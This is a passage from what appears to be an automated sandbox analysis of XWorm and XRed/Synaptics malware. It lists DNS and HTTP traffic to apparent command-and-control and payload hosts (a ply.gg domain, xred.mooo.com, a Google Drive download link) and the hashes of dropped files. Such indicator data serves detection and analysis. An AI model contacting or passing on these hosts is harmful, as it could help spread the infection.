      65.204.58.216.in-addr.arpa
      IN PTR
      lhr25s13-in-f65.1e100.net
    • 208.95.112.1:80
      URL: http://ip-api.com/line/?fields=hosting
      Protocol: http
      Process: ._cache_Xworm.exe
      Sent: 310 B
      Received: 267 B
      Packets sent: 5
      Packets received: 2
      HTTP request: GET http://ip-api.com/line/?fields=hosting
      HTTP response: 200
    • 69.42.215.252:80
      URL: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
      Protocol: http
      Process: Synaptics.exe
      Sent: 752 B
      Received: 415 B
      Packets sent: 13
      Packets received: 4
      HTTP request: GET http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
      HTTP response: 200
    • 147.185.221.25:27183
      Domain: simply-exotic.gl.at.ply.gg
      Process: ._cache_Xworm.exe
      Sent: 506 B
      Received: 250 B
      Packets sent: 5
      Packets received: 5
    • 216.58.212.206:443
      URL: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Protocol: tls, http
      Process: Synaptics.exe
      Sent: 1.9kB
      Received: 11.3kB
      Packets sent: 16
      Packets received: 13
      HTTP request: GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      HTTP response: 303
      HTTP request: GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      HTTP response: 303
      HTTP request: GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      HTTP response: 303
    • 142.250.187.227:80
      URL: http://c.pki.goog/r/r1.crl
      Protocol: http
      Process: Synaptics.exe
      Sent: 303 B
      Received: 1.7kB
      Packets sent: 4
      Packets received: 4
      HTTP request: GET http://c.pki.goog/r/r1.crl
      HTTP response: 200
    • 142.250.187.227:80
      URL: http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCtrC6LRgin8QlSmIIYAEvj
      Protocol: http
      Process: Synaptics.exe
      Sent: 736 B
      Received: 1.6kB
      Packets sent: 6
      Packets received: 4
      HTTP request: GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDREXAZkIcRFgn9FoWvtnQ0
      HTTP response: 200
      HTTP request: GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCtrC6LRgin8QlSmIIYAEvj
      HTTP response: 200
    • 216.58.204.65:443
      URL: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Protocol: tls, http
      Process: Synaptics.exe
      Sent: 2.4kB
      Received: 14.7kB
      Packets sent: 23
      Packets received: 21
      HTTP request: GET https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      HTTP response: 404
      HTTP request: GET https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      HTTP response: 404
      HTTP request: GET https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      HTTP response: 404
    • 8.8.8.8:53
      Domain: 58.55.71.13.in-addr.arpa
      Protocol: dns
      Sent: 70 B
      Received: 144 B
      Packets sent: 1
      Packets received: 1
      DNS request: 58.55.71.13.in-addr.arpa
    • 8.8.8.8:53
      Domain: 73.159.190.20.in-addr.arpa
      Protocol: dns
      Sent: 72 B
      Received: 158 B
      Packets sent: 1
      Packets received: 1
      DNS request: 73.159.190.20.in-addr.arpa
    • 8.8.8.8:53
      Domain: 3.108.50.23.in-addr.arpa
      Protocol: dns
      Sent: 70 B
      Received: 133 B
      Packets sent: 1
      Packets received: 1
      DNS request: 3.108.50.23.in-addr.arpa
    • 8.8.8.8:53
      Domain: ip-api.com
      Protocol: dns
      Process: ._cache_Xworm.exe
      Sent: 56 B
      Received: 72 B
      Packets sent: 1
      Packets received: 1
      DNS request: ip-api.com
      DNS response: 208.95.112.1
    • 8.8.8.8:53
      Domain: 46.28.109.52.in-addr.arpa
      Protocol: dns
      Sent: 71 B
      Received: 145 B
      Packets sent: 1
      Packets received: 1
      DNS request: 46.28.109.52.in-addr.arpa
    • 8.8.8.8:53
      Domain: 1.112.95.208.in-addr.arpa
      Protocol: dns
      Sent: 71 B
      Received: 95 B
      Packets sent: 1
      Packets received: 1
      DNS request: 1.112.95.208.in-addr.arpa
    • 8.8.8.8:53
      Domain: xred.mooo.com
      Protocol: dns
      Process: Synaptics.exe
      Sent: 59 B
      Received: 118 B
      Packets sent: 1
      Packets received: 1
      DNS request: xred.mooo.com
    • 8.8.8.8:53
      Domain: freedns.afraid.org
      Protocol: dns
      Process: Synaptics.exe
      Sent: 64 B
      Received: 80 B
      Packets sent: 1
      Packets received: 1
      DNS request: freedns.afraid.org
      DNS response: 69.42.215.252
    • 224.0.0.251:5353
      Sent: 57 B
      Packets sent: 1
    • 8.8.8.8:53
      Domain: 104.246.116.51.in-addr.arpa
      Protocol: dns
      Sent: 73 B
      Received: 159 B
      Packets sent: 1
      Packets received: 1
      DNS request: 104.246.116.51.in-addr.arpa
    • 8.8.8.8:53
      Domain: 252.215.42.69.in-addr.arpa
      Protocol: dns
      Sent: 144 B
      Received: 144 B
      Packets sent: 2
      Packets received: 2
      DNS request: 252.215.42.69.in-addr.arpa
      DNS request: 252.215.42.69.in-addr.arpa
    • 8.8.8.8:53
      Domain: simply-exotic.gl.at.ply.gg
      Protocol: dns
      Process: ._cache_Xworm.exe
      Sent: 72 B
      Received: 88 B
      Packets sent: 1
      Packets received: 1
      DNS request: simply-exotic.gl.at.ply.gg
      DNS response: 147.185.221.25
    • 8.8.8.8:53
      Domain: 25.221.185.147.in-addr.arpa
      Protocol: dns
      Sent: 73 B
      Received: 130 B
      Packets sent: 1
      Packets received: 1
      DNS request: 25.221.185.147.in-addr.arpa
    • 8.8.8.8:53
      Domain: 241.150.49.20.in-addr.arpa
      Protocol: dns
      Sent: 72 B
      Received: 158 B
      Packets sent: 1
      Packets received: 1
      DNS request: 241.150.49.20.in-addr.arpa
    • 8.8.8.8:53
      Domain: 50.23.12.20.in-addr.arpa
      Protocol: dns
      Sent: 70 B
      Received: 156 B
      Packets sent: 1
      Packets received: 1
      DNS request: 50.23.12.20.in-addr.arpa
    • 8.8.8.8:53
      Domain: 77.190.18.2.in-addr.arpa
      Protocol: dns
      Sent: 70 B
      Received: 133 B
      Packets sent: 1
      Packets received: 1
      DNS request: 77.190.18.2.in-addr.arpa
    • 8.8.8.8:53
      Domain: docs.google.com
      Protocol: dns
      Process: Synaptics.exe
      Sent: 61 B
      Received: 77 B
      Packets sent: 1
      Packets received: 1
      DNS request: docs.google.com
      DNS response: 216.58.212.206

    • 8.8.8.8:53
      c.pki.goog
      dns
      Synaptics.exe
      56 B
      107 B
      1
      1

      DNS Request

      c.pki.goog

      DNS Response

      142.250.187.227

    • 8.8.8.8:53
      o.pki.goog
      dns
      Synaptics.exe
      56 B
      107 B
      1
      1

      DNS Request

      o.pki.goog

      DNS Response

      142.250.187.227

    • 8.8.8.8:53
      drive.usercontent.google.com
      dns
      Synaptics.exe
      74 B
      90 B
      1
      1

      DNS Request

      drive.usercontent.google.com

      DNS Response

      216.58.204.65

    • 8.8.8.8:53
      206.212.58.216.in-addr.arpa
      dns
      73 B
      173 B
      1
      1

      DNS Request

      206.212.58.216.in-addr.arpa

    • 8.8.8.8:53
      227.187.250.142.in-addr.arpa
      dns
      74 B
      112 B
      1
      1

      DNS Request

      227.187.250.142.in-addr.arpa

    • 8.8.8.8:53
      65.204.58.216.in-addr.arpa
      dns
      72 B
      169 B
      1
      1

      DNS Request

      65.204.58.216.in-addr.arpa

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\ProgramData\Synaptics\Synaptics.exe

      Filesize

      828KB

      MD5

      f2dba5b93fa78fe0357cae18d68bc13f

      SHA1

      686e5e1ae65116c4d22315b15992163ad4d34f7c

      SHA256

      0d8cc0a75238c05e1b072683ee43d7e0bf827dde7a652df1467333a2b1f6a570

      SHA512

      cc9714c48fc9c36f98ec2230e96efd5016c254059cf23ea7ccf318e3e44337559e6f5f48d5b9367a10c5b87bd05df6345c58c64eb728769f649b2411f4dc3970

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      6d42b6da621e8df5674e26b799c8e2aa

      SHA1

      ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

      SHA256

      5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

      SHA512

      53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      fd98baf5a9c30d41317663898985593b

      SHA1

      ea300b99f723d2429d75a6c40e0838bf60f17aad

      SHA256

      9d97a5bbc88fdcceac25f293383f7e5ce242675460ffbfb2ee9090870c034e96

      SHA512

      bf4dbbd671b5d7afb326622a7c781f150860294d3dba7160330046c258c84a15981c70e50d84dc7faaa7cc8b8c90bf8df818b3f2d3806a8a3671dfe5e38fe7b0

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      ce4540390cc4841c8973eb5a3e9f4f7d

      SHA1

      2293f30a6f4c9538bc5b06606c10a50ab4ecef8e

      SHA256

      e834e1da338b9644d538cefd70176768816da2556939c1255d386931bd085105

      SHA512

      2a3e466cb5a81d2b65256053b768a98321eb3e65ff46353eefc9864f14a391748116f050e7482ddd73a51575bf0a6fc5c673023dade62dbd8b174442bae1cc6b

    • C:\Users\Admin\AppData\Local\Temp\._cache_Xworm.exe

      Filesize

      75KB

      MD5

      f63d6c11422e7e0ca83981e8dae62f96

      SHA1

      c9c6088a764b07e7d438ad603a8bfcd9972f2b06

      SHA256

      7ed1b4c14c9dfc97094ac40c5fb6c1fe109e4bfcbc953f2ba4331686388be531

      SHA512

      b4dc1037a4fa38482e355aa3f4ac8288aa926dd7c24ee5cd260b5418ebd9ba6a53ef41f3e862eaa71795a2d0b7407fc9d700ec9a224d45f4b7af1e2063f991d9

    • C:\Users\Admin\AppData\Local\Temp\29875E00

      Filesize

      25KB

      MD5

      dba0bd51160965c3b4ac787c1e7c02f0

      SHA1

      a54caa7444de8c41bb67dfb5a07f6b734845f9ad

      SHA256

      479b2759121bb3b6bf368c778f7832893063a0e3e8689d41bac57884d1bd5faf

      SHA512

      1966f1f8f54e519ea2a001b1bae46a80295c0de8773d06a1d3dfe21e940e6f8b221ffbb70bc3df884ba5b8a8ddfb7f999c4a19ec852362e476007944ab175c17

    • C:\Users\Admin\AppData\Local\Temp\ZKcSdTQp.xlsm

      Filesize

      17KB

      MD5

      e566fc53051035e1e6fd0ed1823de0f9

      SHA1

      00bc96c48b98676ecd67e81a6f1d7754e4156044

      SHA256

      8e574b4ae6502230c0829e2319a6c146aebd51b7008bf5bbfb731424d7952c15

      SHA512

      a12f56ff30ea35381c2b8f8af2446cf1daa21ee872e98cad4b863db060acd4c33c5760918c277dadb7a490cb4ca2f925d59c70dc5171e16601a11bc4a6542b04

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q0qkcbay.byz.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\tmpDAFE.tmp.bat

      Filesize

      165B

      MD5

      2df96a49e00dd3f3093d23e6bbb60ced

      SHA1

      777217aa6c138af0a4f148c49226e5b4e67fe896

      SHA256

      04e25e6a1dc75d0253924a2c5eb742524e7d7beb7da23b4bcf47eabe46b951d0

      SHA512

      69759b9fad4cac83c69de2613709c5f840dfc3acb28f8cb766385ab6f2b49a306190fe2568bbe458f8310c7b17045522c7c838c88b82c6e3ffedf6ce1fc958ff

    • memory/532-304-0x00007FFFFDBF3000-0x00007FFFFDBF5000-memory.dmp

      Filesize

      8KB

    • memory/532-77-0x00000000003E0000-0x00000000003FA000-memory.dmp

      Filesize

      104KB

    • memory/532-307-0x000000001B100000-0x000000001B110000-memory.dmp

      Filesize

      64KB

    • memory/532-240-0x000000001B100000-0x000000001B110000-memory.dmp

      Filesize

      64KB

    • memory/532-70-0x00007FFFFDBF3000-0x00007FFFFDBF5000-memory.dmp

      Filesize

      8KB

    • memory/844-247-0x0000022AA0330000-0x0000022AA0352000-memory.dmp

      Filesize

      136KB

    • memory/4180-339-0x0000000000400000-0x00000000004D5000-memory.dmp

      Filesize

      852KB

    • memory/4180-306-0x0000000002140000-0x0000000002141000-memory.dmp

      Filesize

      4KB

    • memory/4180-305-0x0000000000400000-0x00000000004D5000-memory.dmp

      Filesize

      852KB

    • memory/4180-131-0x0000000002140000-0x0000000002141000-memory.dmp

      Filesize

      4KB

    • memory/4872-192-0x00007FF7DC3B0000-0x00007FF7DC3C0000-memory.dmp

      Filesize

      64KB

    • memory/4872-195-0x00007FF7DC3B0000-0x00007FF7DC3C0000-memory.dmp

      Filesize

      64KB

    • memory/4872-193-0x00007FF7DC3B0000-0x00007FF7DC3C0000-memory.dmp

      Filesize

      64KB

    • memory/4872-196-0x00007FF7DC3B0000-0x00007FF7DC3C0000-memory.dmp

      Filesize

      64KB

    • memory/4872-198-0x00007FF7DA1E0000-0x00007FF7DA1F0000-memory.dmp

      Filesize

      64KB

    • memory/4872-194-0x00007FF7DC3B0000-0x00007FF7DC3C0000-memory.dmp

      Filesize

      64KB

    • memory/4872-197-0x00007FF7DA1E0000-0x00007FF7DA1F0000-memory.dmp

      Filesize

      64KB

    • memory/5092-130-0x0000000000400000-0x00000000004D5000-memory.dmp

      Filesize

      852KB

    • memory/5092-0-0x00000000006E0000-0x00000000006E1000-memory.dmp

      Filesize

      4KB
